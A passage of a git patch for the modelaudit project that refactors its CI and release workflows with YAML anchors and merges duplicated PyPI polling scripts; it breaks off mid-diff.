From 3948e2b920a9e62793167f74e75e5ddd021795d1 Mon Sep 17 00:00:00 2001 From: Michael D'Angelo Date: Sat, 3 Oct 2026 00:40:18 +0000 Subject: [PATCH 01/24] refactor(tooling): consolidate build and verification workflows --- .editorconfig | 11 +- .github/workflows/codeql.yml | 6 +- .github/workflows/docker-image-test.yml | 18 +- .github/workflows/docker-publish.yml | 20 +- .github/workflows/nightly.yml | 30 +-- .github/workflows/perf.yml | 15 +- .github/workflows/release-please.yml | 219 ++++++----------- .github/workflows/test.yml | 304 ++++++------------------ Dockerfile | 15 +- Dockerfile.full | 14 +- Dockerfile.tensorflow | 15 +- docker-compose.yml | 8 +- docker-entrypoint.sh | 7 +- docker-install-rust.sh | 16 ++ pyproject.toml | 5 - scripts/benchmark_report.py | 12 +- scripts/compile_tensorflow_protos.sh | 35 +-- scripts/large_pickle_corpus_qa.py | 268 ++++++++------------- tests/__init__.py | 4 + tests/helpers/workflows.py | 23 ++ tests/test_docker_workflow.py | 35 +-- tests/test_perf_workflow.py | 22 +- tests/test_release_workflow.py | 27 +-- 23 files changed, 363 insertions(+), 766 deletions(-) create mode 100644 docker-install-rust.sh create mode 100644 tests/helpers/workflows.py diff --git a/.editorconfig b/.editorconfig index 30de00caa..03d94e8dc 100644 --- a/.editorconfig +++ b/.editorconfig @@ -1,17 +1,14 @@ root = true -[*.py] +[*.{py,md,yml,yaml,json,toml}] charset = utf-8 end_of_line = lf indent_style = space -indent_size = 4 insert_final_newline = true trim_trailing_whitespace = true +[*.py] +indent_size = 4 + [*.{md,yml,yaml,json,toml}] -charset = utf-8 -end_of_line = lf -indent_style = space indent_size = 2 -insert_final_newline = true -trim_trailing_whitespace = true diff --git a/.github/workflows/codeql.yml b/.github/workflows/codeql.yml index 6ede215d9..d5e15dfbf 100644 --- a/.github/workflows/codeql.yml +++ b/.github/workflows/codeql.yml @@ -1,12 +1,10 @@ name: CodeQL Security Analysis on: - push: - branches: - - main - pull_request: + push: &main-branch-trigger branches: - main + pull_request: *main-branch-trigger schedule: # Run weekly on Monday at 06:00 UTC - cron: "0 6 * * 1" diff --git a/.github/workflows/docker-image-test.yml b/.github/workflows/docker-image-test.yml index 8fd05972a..c06f04844 100644 --- a/.github/workflows/docker-image-test.yml +++ b/.github/workflows/docker-image-test.yml @@ -4,6 +4,7 @@ on: pull_request: paths: - "Dockerfile*" + - "docker-install-rust.sh" - ".dockerignore" - "modelaudit/**" - "packages/modelaudit-picklescan/**" @@ -37,6 +38,7 @@ jobs: filters: | docker: - 'Dockerfile*' + - 'docker-install-rust.sh' - '.dockerignore' - 'modelaudit/**' - 'packages/modelaudit-picklescan/**' @@ -45,10 +47,12 @@ jobs: - '.github/workflows/docker-image-test.yml' full-image: - 'Dockerfile.full' + - 'docker-install-rust.sh' - 'packages/modelaudit-picklescan/**' - '.github/workflows/docker-image-test.yml' tensorflow-image: - 'Dockerfile.tensorflow' + - 'docker-install-rust.sh' - 'requirements-tensorflow.txt' - 'modelaudit/**' - 'packages/modelaudit-picklescan/**' @@ -65,7 +69,8 @@ jobs: steps: - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 - - name: Set up Docker Buildx + - &shared-set-up-docker-buildx + name: Set up Docker Buildx uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4 - name: Build lightweight image @@ -77,7 +82,7 @@ jobs: load: true cache-from: type=gha,scope=lightweight cache-to: type=gha,mode=max,scope=lightweight - build-args: | + build-args: &inline-cache-build-args | BUILDKIT_INLINE_CACHE=1 - name: Test lightweight container help command @@ -130,8 +135,7 @@ jobs: - name: Set up QEMU uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4 - - name: Set up Docker Buildx - uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4 + - *shared-set-up-docker-buildx - name: Build full image uses: docker/build-push-action@53b7df96c91f9c12dcc8a07bcb9ccacbed38856a # v7 @@ -142,8 +146,7 @@ jobs: load: true cache-from: type=gha,scope=full cache-to: type=gha,mode=max,scope=full - build-args: | - BUILDKIT_INLINE_CACHE=1 + build-args: *inline-cache-build-args timeout-minutes: 60 # Increased timeout for ML dependency build - name: Test full container help command @@ -195,8 +198,7 @@ jobs: steps: - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 - - name: Set up Docker Buildx - uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4 + - *shared-set-up-docker-buildx - name: Build TensorFlow image uses: docker/build-push-action@53b7df96c91f9c12dcc8a07bcb9ccacbed38856a # v7 diff --git a/.github/workflows/docker-publish.yml b/.github/workflows/docker-publish.yml index 09db494e5..487402482 100644 --- a/.github/workflows/docker-publish.yml +++ b/.github/workflows/docker-publish.yml @@ -24,16 +24,17 @@ jobs: if: github.event_name == 'workflow_dispatch' runs-on: ubuntu-latest timeout-minutes: 5 - outputs: + outputs: &validated-image-outputs image_tag: ${{ steps.validate.outputs.image_tag }} source_ref: ${{ steps.validate.outputs.source_ref }} source_sha: ${{ steps.validate.outputs.source_sha }} environment: name: ghcr-manual-publish - permissions: + permissions: &read-contents-permissions contents: read steps: - - name: Checkout repo + - &shared-checkout-repo + name: Checkout repo uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 with: ref: ${{ github.event.repository.default_branch }} @@ -56,17 +57,10 @@ jobs: if: github.event_name == 'release' && startsWith(github.event.release.tag_name, 'v') runs-on: ubuntu-latest timeout-minutes: 5 - outputs: - image_tag: ${{ steps.validate.outputs.image_tag }} - source_ref: ${{ steps.validate.outputs.source_ref }} - source_sha: ${{ steps.validate.outputs.source_sha }} - permissions: - contents: read + outputs: *validated-image-outputs + permissions: *read-contents-permissions steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 - with: - ref: ${{ github.event.repository.default_branch }} + - *shared-checkout-repo - name: Validate release image tag id: validate diff --git a/.github/workflows/nightly.yml b/.github/workflows/nightly.yml index fc3bf9625..9fde9fd49 100644 --- a/.github/workflows/nightly.yml +++ b/.github/workflows/nightly.yml @@ -25,10 +25,12 @@ jobs: - { os: windows-latest, python-version: "3.12" } - { os: windows-latest, python-version: "3.13" } steps: - - name: Checkout repo + - &checkout-repo + name: Checkout repo uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 - - name: Install uv + - &install-uv + name: Install uv uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 with: enable-cache: true @@ -37,7 +39,8 @@ jobs: run: | uv python pin ${{ matrix.python-version }} - - name: Install Rust toolchain + - &install-rust-toolchain + name: Install Rust toolchain run: | rustup toolchain install stable --profile minimal rustup default stable @@ -55,22 +58,15 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 45 steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - name: Pin Python version run: | uv python pin 3.11 - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - name: Sync dependencies run: | @@ -85,13 +81,9 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 45 steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - name: Run standalone picklescan Rust tests once run: | diff --git a/.github/workflows/perf.yml b/.github/workflows/perf.yml index 617a66579..edd00c713 100644 --- a/.github/workflows/perf.yml +++ b/.github/workflows/perf.yml @@ -2,7 +2,7 @@ name: Performance Benchmarks on: pull_request: - paths: + paths: &benchmark-trigger-paths - "modelaudit/**" - "packages/modelaudit-picklescan/**" - "tests/benchmarks/**" @@ -17,18 +17,7 @@ on: push: branches: - main - paths: - - "modelaudit/**" - - "packages/modelaudit-picklescan/**" - - "tests/benchmarks/**" - - "tests/helpers/**" - - "tests/conftest.py" - - "tests/test_benchmark_report.py" - - "tests/test_performance_benchmarks.py" - - "scripts/benchmark_report.py" - - "pyproject.toml" - - "uv.lock" - - ".github/workflows/perf.yml" + paths: *benchmark-trigger-paths workflow_dispatch: permissions: diff --git a/.github/workflows/release-please.yml b/.github/workflows/release-please.yml index ca1b0209a..d48bcf06a 100644 --- a/.github/workflows/release-please.yml +++ b/.github/workflows/release-please.yml @@ -175,12 +175,13 @@ jobs: if: needs.release-please.outputs.pr_branch != '' runs-on: ubuntu-latest needs: release-please - permissions: + permissions: &read-contents-permissions contents: read outputs: source_sha: ${{ steps.source.outputs.sha }} steps: - - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - &checkout-release-metadata + uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 with: ref: ${{ needs.release-please.outputs.pr_branch }} fetch-depth: 1 @@ -194,7 +195,7 @@ jobs: uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - name: Install Rust toolchain for standalone lock refresh - run: | + run: &install-rust-toolchain | rustup toolchain install stable --profile minimal rustup default stable @@ -240,11 +241,7 @@ jobs: permissions: contents: write steps: - - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 - with: - ref: ${{ needs.release-please.outputs.pr_branch }} - fetch-depth: 1 - persist-credentials: false + - *checkout-release-metadata - name: Download release metadata id: download-metadata @@ -306,22 +303,20 @@ jobs: if: needs.release-please.outputs.release_created == 'true' runs-on: ubuntu-latest needs: release-please - permissions: - contents: read + permissions: *read-contents-permissions outputs: artifact-name: ${{ steps.upload.outputs.artifact-id }} steps: - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 - - name: Install uv + - &install-uv + name: Install uv uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 with: enable-cache: true - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + run: *install-rust-toolchain - name: Type check root package with mypy run: | @@ -593,7 +588,7 @@ jobs: - name: Upload build artifacts id: upload uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7 - with: + with: &root-dist-artifact name: dist path: dist/ @@ -602,8 +597,7 @@ jobs: name: Build standalone pickle package (${{ matrix.artifact-suffix }}) runs-on: ${{ matrix.os }} needs: release-please - permissions: - contents: read + permissions: *read-contents-permissions strategy: fail-fast: false matrix: @@ -630,10 +624,7 @@ jobs: steps: - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - name: Pin Python version run: | @@ -825,15 +816,14 @@ jobs: environment: name: pypi url: https://pypi.org/project/modelaudit/ - permissions: + permissions: &pypi-publish-permissions contents: read id-token: write steps: - - name: Download build artifacts + - &shared-download-build-artifacts + name: Download build artifacts uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8 - with: - name: dist - path: dist/ + with: *root-dist-artifact - name: Verify the root picklescan dependency is available on PyPI run: | @@ -935,7 +925,8 @@ jobs: raise SystemExit(f"Refusing to publish modelaudit with an unavailable picklescan dependency: {last_status}") PY - - name: Publish to PyPI + - &shared-publish-to-pypi + name: Publish to PyPI uses: pypa/gh-action-pypi-publish@cef221092ed1bacb1cc03d23a2d87d1d172e277b # release/v1 with: print-hash: true @@ -948,34 +939,30 @@ jobs: environment: name: pypi url: https://pypi.org/project/modelaudit-picklescan/ - permissions: - contents: read - id-token: write + permissions: *pypi-publish-permissions steps: - - name: Download standalone pickle package artifacts + - &shared-download-standalone-pickle-package-artifacts + name: Download standalone pickle package artifacts uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8 with: pattern: modelaudit-picklescan-dist-* path: dist/ merge-multiple: true - - name: Publish to PyPI - uses: pypa/gh-action-pypi-publish@cef221092ed1bacb1cc03d23a2d87d1d172e277b # release/v1 - with: - print-hash: true - attestations: true + - *shared-publish-to-pypi verify-picklescan-pypi: if: needs.release-please.outputs.picklescan_release_created == 'true' needs: [publish-picklescan-pypi, release-please] runs-on: ubuntu-latest - permissions: - contents: read + permissions: *read-contents-permissions env: EXPECTED_VERSION: ${{ needs.release-please.outputs.picklescan_version }} steps: - name: Wait for modelaudit-picklescan files on PyPI - run: | + env: + PYPI_PROJECT: modelaudit-picklescan + run: &wait-for-pypi-files | python - <<'PY' import gzip import json @@ -985,16 +972,27 @@ jobs: import zlib version = os.environ["EXPECTED_VERSION"] + project = os.environ["PYPI_PROJECT"] expected_files = { - f"modelaudit_picklescan-{version}-cp310-abi3-macosx_10_12_x86_64.whl", - f"modelaudit_picklescan-{version}-cp310-abi3-macosx_11_0_arm64.whl", - f"modelaudit_picklescan-{version}-cp310-abi3-manylinux_2_28_aarch64.whl", - f"modelaudit_picklescan-{version}-cp310-abi3-manylinux_2_28_x86_64.whl", - f"modelaudit_picklescan-{version}-cp310-abi3-win_amd64.whl", - f"modelaudit_picklescan-{version}.tar.gz", + 'modelaudit-picklescan': { + f"modelaudit_picklescan-{version}-cp310-abi3-macosx_10_12_x86_64.whl", + f"modelaudit_picklescan-{version}-cp310-abi3-macosx_11_0_arm64.whl", + f"modelaudit_picklescan-{version}-cp310-abi3-manylinux_2_28_aarch64.whl", + f"modelaudit_picklescan-{version}-cp310-abi3-manylinux_2_28_x86_64.whl", + f"modelaudit_picklescan-{version}-cp310-abi3-win_amd64.whl", + f"modelaudit_picklescan-{version}.tar.gz", + }, + 'modelaudit': { + f"modelaudit-{version}-py3-none-any.whl", + f"modelaudit-{version}.tar.gz", + }, + }[project] + url_templates = { + "modelaudit-picklescan": ("https://pypi.org/pypi/modelaudit-picklescan/{version}/json", "https://pypi.org/simple/modelaudit-picklescan/"), + "modelaudit": ("https://pypi.org/pypi/modelaudit/{version}/json", "https://pypi.org/simple/modelaudit/"), } - url = f"https://pypi.org/pypi/modelaudit-picklescan/{version}/json" - simple_url = "https://pypi.org/simple/modelaudit-picklescan/" + url, simple_url = url_templates[project] + url = url.format(version=version) deadline = time.monotonic() + 600 last_status = "not checked" @@ -1028,14 +1026,14 @@ jobs: missing_simple = sorted(expected_files - simple_filenames) info_version = payload.get("info", {}).get("version") if info_version == version and not missing and not missing_simple: - print(f"PyPI has modelaudit-picklescan {version}: {sorted(filenames)}") + print(f"PyPI has {project} {version}: {sorted(filenames)}") break last_status = f"version={info_version!r}, missing={missing}, missing_simple={missing_simple}" except Exception as exc: last_status = repr(exc) time.sleep(10) else: - raise SystemExit(f"Timed out waiting for modelaudit-picklescan {version} on PyPI: {last_status}") + raise SystemExit(f"Timed out waiting for {project} {version} on PyPI: {last_status}") PY - name: Install published modelaudit-picklescan and smoke test API @@ -1103,8 +1101,7 @@ jobs: verify-picklescan-pypi, ] runs-on: ubuntu-latest - permissions: - contents: read + permissions: *read-contents-permissions env: EXPECTED_VERSION: ${{ needs.release-please.outputs.version }} EXPECTED_PICKLESCAN_VERSION: ${{ needs.release-please.outputs.picklescan_version }} @@ -1112,64 +1109,9 @@ jobs: PROMPTFOO_DISABLE_TELEMETRY: "1" steps: - name: Wait for modelaudit files on PyPI - run: | - python - <<'PY' - import gzip - import json - import os - import time - import urllib.request - import zlib - - version = os.environ["EXPECTED_VERSION"] - expected_files = { - f"modelaudit-{version}-py3-none-any.whl", - f"modelaudit-{version}.tar.gz", - } - url = f"https://pypi.org/pypi/modelaudit/{version}/json" - simple_url = "https://pypi.org/simple/modelaudit/" - deadline = time.monotonic() + 600 - last_status = "not checked" - - while time.monotonic() < deadline: - try: - with urllib.request.urlopen(url, timeout=20) as response: - payload = json.load(response) - request = urllib.request.Request( - simple_url, - headers={ - "Accept": "application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01", - "Accept-Encoding": "gzip, deflate", - "Cache-Control": "max-age=0", - }, - ) - with urllib.request.urlopen(request, timeout=20) as response: - simple_body = response.read() - content_encoding = response.headers.get("Content-Encoding", "identity").lower() - if content_encoding == "gzip": - simple_body = gzip.decompress(simple_body) - elif content_encoding == "deflate": - simple_body = zlib.decompress(simple_body) - elif content_encoding not in ("", "identity"): - raise ValueError(f"Unsupported Simple API Content-Encoding: {content_encoding!r}") - simple_payload = json.loads(simple_body) - filenames = {entry["filename"] for entry in payload.get("urls", [])} - simple_filenames = { - entry["filename"] for entry in simple_payload.get("files", []) if not entry.get("yanked", False) - } - missing = sorted(expected_files - filenames) - missing_simple = sorted(expected_files - simple_filenames) - info_version = payload.get("info", {}).get("version") - if info_version == version and not missing and not missing_simple: - print(f"PyPI has modelaudit {version}: {sorted(filenames)}") - break - last_status = f"version={info_version!r}, missing={missing}, missing_simple={missing_simple}" - except Exception as exc: - last_status = repr(exc) - time.sleep(10) - else: - raise SystemExit(f"Timed out waiting for modelaudit {version} on PyPI: {last_status}") - PY + env: + PYPI_PROJECT: modelaudit + run: *wait-for-pypi-files - name: Install published modelaudit and run end-to-end smoke tests run: | @@ -1320,29 +1262,23 @@ jobs: }} needs: [build, publish-pypi, verify-pypi, release-please] runs-on: ubuntu-latest - permissions: + permissions: &provenance-permissions contents: write id-token: write attestations: write steps: - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 with: - sparse-checkout: | + sparse-checkout: &root-lock-inputs | pyproject.toml uv.lock - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Download build artifacts - uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8 - with: - name: dist - path: dist/ + - *shared-download-build-artifacts - - name: Generate artifact attestations + - &shared-generate-artifact-attestations + name: Generate artifact attestations uses: actions/attest-build-provenance@4d101475d8b20a2381f78447822ac1eab6504dd8 # v4 with: subject-path: "dist/*" @@ -1362,7 +1298,7 @@ jobs: # Upload wheel/sdist and SBOM to the GitHub Release as an alternative # download location alongside PyPI. --clobber ensures idempotency on re-runs. - name: Upload build artifacts to GitHub Release - env: + env: &github-token-env GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | gh release upload "${{ needs.release-please.outputs.tag_name }}" dist/* \ @@ -1388,9 +1324,7 @@ jobs: uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 with: ref: refs/tags/${{ needs.release-please.outputs.tag_name }} - sparse-checkout: | - pyproject.toml - uv.lock + sparse-checkout: *root-lock-inputs persist-credentials: false - name: Verify original root publish run @@ -1548,7 +1482,7 @@ jobs: run-id: ${{ needs.release-please.outputs.root_provenance_run_id }} - name: Verify recovered root artifacts match PyPI - env: + env: &root-version-env EXPECTED_VERSION: ${{ needs.release-please.outputs.version }} run: | python - <<'PY' @@ -1734,14 +1668,10 @@ jobs: predicate: >- {"package":"modelaudit","version":"${{ needs.release-please.outputs.version }}","tag":"${{ needs.release-please.outputs.tag_name }}","source_run_id":"${{ needs.release-please.outputs.root_provenance_run_id }}","source_commit":"${{ steps.verify-source.outputs.source_head_sha }}","tag_commit":"${{ steps.verify-source.outputs.tag_commit_sha }}","pypi_json_url":"https://pypi.org/pypi/modelaudit/${{ needs.release-please.outputs.version }}/json"} - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - name: Generate SBOM from tagged root lockfile - env: - EXPECTED_VERSION: ${{ needs.release-please.outputs.version }} + env: *root-version-env run: | uv export \ --frozen \ @@ -1767,10 +1697,7 @@ jobs: if: needs.release-please.outputs.picklescan_release_created == 'true' needs: [build-picklescan-package, publish-picklescan-pypi, release-please] runs-on: ubuntu-latest - permissions: - contents: write - id-token: write - attestations: write + permissions: *provenance-permissions steps: - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 with: @@ -1778,22 +1705,11 @@ jobs: packages/modelaudit-picklescan/pyproject.toml packages/modelaudit-picklescan/uv.lock - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Download standalone pickle package artifacts - uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8 - with: - pattern: modelaudit-picklescan-dist-* - path: dist/ - merge-multiple: true + - *shared-download-standalone-pickle-package-artifacts - - name: Generate artifact attestations - uses: actions/attest-build-provenance@4d101475d8b20a2381f78447822ac1eab6504dd8 # v4 - with: - subject-path: "dist/*" + - *shared-generate-artifact-attestations - name: Generate standalone package SBOM working-directory: packages/modelaudit-picklescan @@ -1809,8 +1725,7 @@ jobs: ls -la ../../dist/*.cdx.json - name: Upload standalone artifacts to GitHub Release - env: - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + env: *github-token-env run: | gh release upload "${{ needs.release-please.outputs.picklescan_tag_name }}" dist/* \ --repo "${{ github.repository }}" \ diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 7506a1290..ef7583b1f 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -59,6 +59,7 @@ jobs: - 'packages/modelaudit-picklescan/**' docker: - 'Dockerfile*' + - 'docker-install-rust.sh' - '.dockerignore' workflows: - '.github/workflows/**' @@ -76,27 +77,32 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 10 steps: - - name: Checkout repo + - &checkout-repo + name: Checkout repo uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 - - name: Install uv + - &install-uv + name: Install uv uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 with: enable-cache: true - - name: Pin Python version + - &pin-python-312 + name: Pin Python version run: | uv python pin 3.12 - - name: Install Rust toolchain + - &install-rust-toolchain + name: Install Rust toolchain run: | rustup toolchain install stable --profile minimal rustup default stable - - name: Cache Python dependencies + - &cache-python-312-dependencies + name: Cache Python dependencies uses: actions/cache@caa296126883cff596d87d8935842f9db880ef25 # v5 with: - path: | + path: &python-cache-paths | .venv ~/.cache/pip ~/.cache/uv @@ -105,7 +111,8 @@ jobs: ${{ runner.os }}-uv-py3.12- ${{ runner.os }}-uv- - - name: Sync dependencies + - &sync-all-ci-dependencies + name: Sync dependencies run: | uv sync --extra all-ci @@ -113,10 +120,6 @@ jobs: run: | uv run ruff check modelaudit/ tests/ - - name: Check import organization with Ruff - run: | - uv run ruff check --select I modelaudit/ tests/ - - name: Check formatting with Ruff run: | uv run ruff format --check modelaudit/ tests/ @@ -128,17 +131,11 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 10 steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Pin Python version - run: | - uv python pin 3.12 + - *pin-python-312 - name: Audit dependencies for vulnerabilities run: | @@ -166,26 +163,15 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 10 steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Pin Python version - run: | - uv python pin 3.12 + - *pin-python-312 - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - - name: Sync dependencies - run: | - uv sync --extra all-ci + - *sync-all-ci-dependencies - name: Check dependency licenses run: | @@ -312,22 +298,17 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 10 steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - name: Check uv.lock is in sync with pyproject.toml - run: | + run: &check-uv-lock | uv lock --check - name: Check standalone picklescan uv.lock is in sync working-directory: packages/modelaudit-picklescan - run: | - uv lock --check + run: *check-uv-lock type-check: name: Type Check @@ -337,13 +318,9 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 10 steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - name: Pin Python version run: | @@ -351,26 +328,18 @@ jobs: # syntax valid for the minimum supported Python target. uv python pin 3.10 - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - name: Cache Python dependencies uses: actions/cache@caa296126883cff596d87d8935842f9db880ef25 # v5 with: - path: | - .venv - ~/.cache/pip - ~/.cache/uv + path: *python-cache-paths key: ${{ runner.os }}-uv-py3.10-${{ hashFiles('**/uv.lock', '**/pyproject.toml') }} restore-keys: | ${{ runner.os }}-uv-py3.10- ${{ runner.os }}-uv- - - name: Sync dependencies - run: | - uv sync --extra all-ci + - *sync-all-ci-dependencies - name: Type checking run: | @@ -392,8 +361,7 @@ jobs: matrix: include: ${{ github.event_name == 'pull_request' && needs.changes.outputs.workflows != 'true' && fromJSON('[{"shard-count":1,"shard-index":0,"shard-name":"1/1"}]') || fromJSON('[{"shard-count":2,"shard-index":0,"shard-name":"1/2"},{"shard-count":2,"shard-index":1,"shard-name":"2/2"}]') }} steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - name: Install uv uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 @@ -402,10 +370,7 @@ jobs: run: | uv python pin 3.11 - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - name: Sync dependencies run: | @@ -435,38 +400,27 @@ jobs: matrix: include: ${{ github.event_name == 'pull_request' && needs.changes.outputs.workflows != 'true' && fromJSON('[{"python-version":"3.10","shard-count":1,"shard-index":0,"shard-name":"1/1"},{"python-version":"3.12","shard-count":1,"shard-index":0,"shard-name":"1/1"},{"python-version":"3.13","shard-count":1,"shard-index":0,"shard-name":"1/1"}]') || fromJSON('[{"python-version":"3.10","shard-count":2,"shard-index":0,"shard-name":"1/2"},{"python-version":"3.10","shard-count":2,"shard-index":1,"shard-name":"2/2"},{"python-version":"3.11","shard-count":2,"shard-index":0,"shard-name":"1/2"},{"python-version":"3.11","shard-count":2,"shard-index":1,"shard-name":"2/2"},{"python-version":"3.12","shard-count":2,"shard-index":0,"shard-name":"1/2"},{"python-version":"3.12","shard-count":2,"shard-index":1,"shard-name":"2/2"},{"python-version":"3.13","shard-count":2,"shard-index":0,"shard-name":"1/2"},{"python-version":"3.13","shard-count":2,"shard-index":1,"shard-name":"2/2"}]') }} steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Pin Python version + - &pin-matrix-python + name: Pin Python version run: | uv python pin ${{ matrix.python-version }} - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - name: Cache Python dependencies uses: actions/cache@caa296126883cff596d87d8935842f9db880ef25 # v5 with: - path: | - .venv - ~/.cache/pip - ~/.cache/uv + path: *python-cache-paths key: ${{ runner.os }}-uv-py${{ matrix.python-version }}-${{ hashFiles('**/uv.lock', '**/pyproject.toml') }} restore-keys: | ${{ runner.os }}-uv-py${{ matrix.python-version }}- ${{ runner.os }}-uv- - - name: Sync dependencies - run: | - uv sync --extra all-ci + - *sync-all-ci-dependencies - name: Run fast tests with fail-fast if: github.event_name == 'pull_request' && needs.changes.outputs.workflows != 'true' @@ -493,38 +447,17 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 20 steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Pin Python version - run: | - uv python pin 3.12 + - *pin-python-312 - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - - name: Cache Python dependencies - uses: actions/cache@caa296126883cff596d87d8935842f9db880ef25 # v5 - with: - path: | - .venv - ~/.cache/pip - ~/.cache/uv - key: ${{ runner.os }}-uv-py3.12-${{ hashFiles('**/uv.lock', '**/pyproject.toml') }} - restore-keys: | - ${{ runner.os }}-uv-py3.12- - ${{ runner.os }}-uv- + - *cache-python-312-dependencies - - name: Sync dependencies - run: | - uv sync --extra all-ci + - *sync-all-ci-dependencies - name: Run slow and integration tests run: | @@ -548,38 +481,17 @@ jobs: matrix: shard: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: 